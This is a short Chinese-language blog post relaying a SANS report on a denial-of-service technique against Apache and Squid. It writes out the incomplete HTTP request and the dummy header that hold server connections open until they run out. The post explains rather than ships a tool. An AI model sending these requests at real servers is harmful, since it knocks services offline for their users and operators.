Apache DoS 漏洞利用工具exploit
SANS昨天报道了一个新的Apache DoS漏洞利用工具:http://isc.sans.org/diary.html?storyid=6601
大致原理是, 攻击者先发送一个包:
GET / HTTP/1.1
Host: host
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)
Content-Length: 42
结尾少了一个 ,所以apache等待,攻击者再发一坨狗屎过去:
X-a: b
Apache一看啥都不是,继续痴痴地等待。。。
攻击者可以多发送一些类似的组合,直到Apache连接数耗尽。
这个东西威力还挺大,因为不需要太多流量,就是一些HTTP头。
目前影响Apache1.x, 2.x和Squid
via:Sowhat